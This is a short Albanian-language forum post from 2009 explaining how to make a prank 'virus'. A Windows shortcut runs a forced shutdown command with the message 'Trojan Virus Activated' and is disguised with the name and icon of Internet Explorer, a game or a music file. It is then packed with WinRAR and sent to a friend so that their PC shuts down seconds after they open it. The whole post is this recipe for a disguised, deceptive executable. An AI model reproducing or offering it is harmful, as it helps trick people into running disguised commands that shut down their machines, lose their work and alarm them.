Si ta krioim nje Shourt per Fikjen e PC's

  Share
  v-KS
  v-KS
  Administrator
  Administrator

  Age : 21
  Poenat : 2384
  Reputacioni : 32
  Numri i postimeve : 822

  Si ta krioim nje Shourt per Fikjen e PC's

  Mesazh nga v-KS prej Thu Aug 20, 2009 1:31 pm

  se parii krijon nje shortcut edhe pastaj e hapet nje tabel dhee e shenon attyyy pa thonjeza "shutdown -s -t 20 -c "Trojan Virus Activated" edhe e shenon emrin psh internet explorer edhe ja ndrron ikonen dhee e bon me winrar edhe ja qon ndonje shokuu dhee pastaj pasii qi ta bonn extract aiii dhe do klikoj mbii tee virusi per 20 sekonda do ti infektohet mund ta beniii me qfaro do ikonee psh loja muzik etj... kalofshi mir

   Ora është Sat Feb 16, 2019 12:34 am